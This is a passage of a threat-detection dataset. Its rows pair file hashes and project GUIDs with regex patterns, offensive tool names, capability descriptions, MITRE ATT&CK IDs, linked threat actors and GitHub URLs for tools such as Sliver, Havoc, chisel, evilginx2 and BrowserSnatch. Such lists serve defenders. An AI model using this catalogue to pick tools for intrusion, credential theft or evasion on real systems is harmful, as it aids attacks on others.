Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","44029" "*f572574e8f466040330510743d57e07ac795ed8caa62856f3efd2bff4f69793d*",".{0,1000}f572574e8f466040330510743d57e07ac795ed8caa62856f3efd2bff4f69793d.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","44031" "*f5776b57d23638d930bcadcfe6b2b2bbaad668472a74843a52d0a512093a05ed*",".{0,1000}f5776b57d23638d930bcadcfe6b2b2bbaad668472a74843a52d0a512093a05ed.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44032" "*f57841b1ef43a21bf127babaf02f391fa0d174b618ccd10b7326b4d83089d78a*",".{0,1000}f57841b1ef43a21bf127babaf02f391fa0d174b618ccd10b7326b4d83089d78a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","44033" "*f57919481704f8a153d95054f5479c713c23246f633ea2ad2f52dde19ee51bc5*",".{0,1000}f57919481704f8a153d95054f5479c713c23246f633ea2ad2f52dde19ee51bc5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use 
SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","44034" "*f579af445d7bae578d9848251bcfeb75f0947df511f68a595c902468fad39086*",".{0,1000}f579af445d7bae578d9848251bcfeb75f0947df511f68a595c902468fad39086.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44036" "*f57a182a690a6b7f1aa7cc9cfb880a3f252cddaab6aaeedaedf0f4883b4104b9*",".{0,1000}f57a182a690a6b7f1aa7cc9cfb880a3f252cddaab6aaeedaedf0f4883b4104b9.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44037" 
"*f585b5225e1165fbeea3219ed3ce74988c60801831d5b7b1b2cc0bec1e4e4793*",".{0,1000}f585b5225e1165fbeea3219ed3ce74988c60801831d5b7b1b2cc0bec1e4e4793.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#filehash","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","44038" "*f58cbacfd41c4b0d5411a48f8142489dbde75c79211f37cb3c11a5063ebb6c2f*",".{0,1000}f58cbacfd41c4b0d5411a48f8142489dbde75c79211f37cb3c11a5063ebb6c2f.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","44039" "*f58d086ed47166b22d02ac004380311058c66aac51551a10b55d421578494f32*",".{0,1000}f58d086ed47166b22d02ac004380311058c66aac51551a10b55d421578494f32.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","44040" "*f58eea2ad17ebbb4245ab1fa29aad1afcd8569ce4c460590438b2e88a16a5529*",".{0,1000}f58eea2ad17ebbb4245ab1fa29aad1afcd8569ce4c460590438b2e88a16a5529.{0,1000}","offensive_tool_keyword","pyrdp","RDP 
monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","44041" "*f5986b6b5b1365e170643d4aa47939b15ea02a9d647e75a2a76bc7c0eb2de702*",".{0,1000}f5986b6b5b1365e170643d4aa47939b15ea02a9d647e75a2a76bc7c0eb2de702.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","44042" "*f59b24c1d84e1bbb4c0dc2677bb4010b474eb36a62c54ed1fbbf04d05aaf6a22*",".{0,1000}f59b24c1d84e1bbb4c0dc2677bb4010b474eb36a62c54ed1fbbf04d05aaf6a22.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","44043" "*f59e403b62053c785de7df979c5cb7b0f426cbeb*",".{0,1000}f59e403b62053c785de7df979c5cb7b0f426cbeb.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","44044" "*f5a0c01add702bb0f03e9e22d30242012cae3e5132a5de9d4888ecf987f3598f*",".{0,1000}f5a0c01add702bb0f03e9e22d30242012cae3e5132a5de9d4888ecf987f3598f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44045" "*f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870*",".{0,1000}f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","#filehash","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","44046" "*F5A53B43-5D6D-48EC-BC44-C0C1A0CEFA8D*",".{0,1000}F5A53B43\-5D6D\-48EC\-BC44\-C0C1A0CEFA8D.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","44047" 
"*f5a5a21ee3a7dfaddae81cae7ef2df852cbfa44fdba51dfa0678a1c2d9d91c36*",".{0,1000}f5a5a21ee3a7dfaddae81cae7ef2df852cbfa44fdba51dfa0678a1c2d9d91c36.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","44048" "*f5b50fa27059710ba9910381fd2fd8dc9c95f2e519e0079bdd1ce34794f60d5c*",".{0,1000}f5b50fa27059710ba9910381fd2fd8dc9c95f2e519e0079bdd1ce34794f60d5c.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","44051" "*f5b5f4793e80983d49568616bd41f6068e6e6543e258fc4064d090956d124fc3*",".{0,1000}f5b5f4793e80983d49568616bd41f6068e6e6543e258fc4064d090956d124fc3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","44052" "*f5b77a3b40d262907ae6c65822622a5d9852fcba0251b9ddc391e8e896ffec2b*",".{0,1000}f5b77a3b40d262907ae6c65822622a5d9852fcba0251b9ddc391e8e896ffec2b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux 
#filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","44053" "*f5b818bbd0a230ab8f0e533b563f678ec774216f4d06e4cc90d0e2e61167eb57*",".{0,1000}f5b818bbd0a230ab8f0e533b563f678ec774216f4d06e4cc90d0e2e61167eb57.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44054" "*f5b82c817528c03e5b0e21c61b07cfba0bb80b9b7e86e12af5b39a2c47e708f7*",".{0,1000}f5b82c817528c03e5b0e21c61b07cfba0bb80b9b7e86e12af5b39a2c47e708f7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44055" "*F5B94815-D623-4947-9A2B-88ABAF7FA6D9*",".{0,1000}F5B94815\-D623\-4947\-9A2B\-88ABAF7FA6D9.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","44056" "*F5BFA34B-3CDE-4C77-9162-96666303FDEA*",".{0,1000}F5BFA34B\-3CDE\-4C77\-9162\-96666303FDEA.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#GUIDproject","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","44058" "*F5BIG-Scanner.py*",".{0,1000}F5BIG\-Scanner\.py.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/jiansiting/CVE-2020-5902","1","0","N/A","N/A","N/A","1","5","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z","44059" "*f5cc1aeedb6a3e4a927ba5c1029c6075b2b9be7cf517cfdd8277bb0b00b5a60e*",".{0,1000}f5cc1aeedb6a3e4a927ba5c1029c6075b2b9be7cf517cfdd8277bb0b00b5a60e.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","44061" "*f5cf5d30d16f2e4cd6deba19cbe539655e2d3c14002e47a35ef30ff6b795e5da*",".{0,1000}f5cf5d30d16f2e4cd6deba19cbe539655e2d3c14002e47a35ef30ff6b795e5da.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44063" "*f5d083622d36be251b6826886fd98b56b573e260db0e113510afcc648886f104*",".{0,1000}f5d083622d36be251b6826886fd98b56b573e260db0e113510afcc648886f104.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","44064" "*f5d12a78dbb405e8dc7b1238ca6825e4f68200cb8aefe56b398957d0ba1d0bcc*",".{0,1000}f5d12a78dbb405e8dc7b1238ca6825e4f68200cb8aefe56b398957d0ba1d0bcc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","44065" "*f5da690a8c9d7656d49401f2b54b3582197b81f6554eda0dc0bd511995db095c*",".{0,1000}f5da690a8c9d7656d49401f2b54b3582197b81f6554eda0dc0bd511995db095c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44067" "*f5e85e80a5eb0184e26a3339871e5a5d0d4db497395f91c8305c018c51040912*",".{0,1000}f5e85e80a5eb0184e26a3339871e5a5d0d4db497395f91c8305c018c51040912.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 
- TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","44069" "*f5e88366bd0d54ec11ea8332379c570a7d796b1f1bcc3db74d016da1367725ef*",".{0,1000}f5e88366bd0d54ec11ea8332379c570a7d796b1f1bcc3db74d016da1367725ef.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","44070" "*f5ef714731d36549ad900a94888613cdcfdddaa07dfb4a56990b2326bfc4cac7*",".{0,1000}f5ef714731d36549ad900a94888613cdcfdddaa07dfb4a56990b2326bfc4cac7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44072" "*f5efe627e03bc8128bc4a3a600774648f2bd9384fb8f146262ae6727133e8414*",".{0,1000}f5efe627e03bc8128bc4a3a600774648f2bd9384fb8f146262ae6727133e8414.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","44073" "*F5F605F596F85A1344F46774D782F4109EA83DD851139338CB07DF90FD1D0D5A*",".{0,1000}F5F605F596F85A1344F46774D782F4109EA83DD851139338CB07DF90FD1D0D5A.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","44075" "*f5fe991e9809b076b41cbda446dda964392f3666a86b87cdb8bf4c8be90040ba*",".{0,1000}f5fe991e9809b076b41cbda446dda964392f3666a86b87cdb8bf4c8be90040ba.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","44076" "*F602DAFE-E8A2-4CB2-AF0E-656CD357D821*",".{0,1000}F602DAFE\-E8A2\-4CB2\-AF0E\-656CD357D821.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense 
Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","44077" "*f606ecc982d3bcbf1ec4651a183d542891fc325f9099ba0e802aa6926abef724*",".{0,1000}f606ecc982d3bcbf1ec4651a183d542891fc325f9099ba0e802aa6926abef724.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","44078" "*F60C3246-D449-412B-A858-3B5E84494D1A*",".{0,1000}F60C3246\-D449\-412B\-A858\-3B5E84494D1A.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","44080" "*f60e242e57d4caa8a918f9809f9a8ded3ad0f05d35be96e4ec1ad366dec0a393*",".{0,1000}f60e242e57d4caa8a918f9809f9a8ded3ad0f05d35be96e4ec1ad366dec0a393.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","44082" "*f6192766029db752408501c6333685fdacc0d4d308222bdea9f6c3c5dd9b31de*",".{0,1000}f6192766029db752408501c6333685fdacc0d4d308222bdea9f6c3c5dd9b31de.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services 
leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","44083" "*f61d03ebf3e6025c457cde531e636b9258ac690ceaae48c5ffb95c37749d1b03*",".{0,1000}f61d03ebf3e6025c457cde531e636b9258ac690ceaae48c5ffb95c37749d1b03.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","44084" "*f61d22d8e8130ff6be2aaf36e1ac8103af3b375549d453deddedb19606751190*",".{0,1000}f61d22d8e8130ff6be2aaf36e1ac8103af3b375549d453deddedb19606751190.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","44085" "*f61ebc6c8692c620a57b7b167206e74131df5e4d651ae55713392bde4b0e8b9f*",".{0,1000}f61ebc6c8692c620a57b7b167206e74131df5e4d651ae55713392bde4b0e8b9f.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#filehash","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","44086" "*F61EEB46-5352-4349-B880-E4A0B38EC0DB*",".{0,1000}F61EEB46\-5352\-4349\-B880\-E4A0B38EC0DB.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing 
a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","44087" "*f630a53430993faf0efc789c5e00680c3c2e83883e44a93565752a4f490dd41d*",".{0,1000}f630a53430993faf0efc789c5e00680c3c2e83883e44a93565752a4f490dd41d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","44088" "*f6324f8d7b34cbf7dd27366148d1a9923219187ea46c4d5c029ed3e37afd47bf*",".{0,1000}f6324f8d7b34cbf7dd27366148d1a9923219187ea46c4d5c029ed3e37afd47bf.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","44089" "*f632fb93b89b788f346784f9e18976a2a116bfd67bfd740feb5dc61c06141e29*",".{0,1000}f632fb93b89b788f346784f9e18976a2a116bfd67bfd740feb5dc61c06141e29.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel 
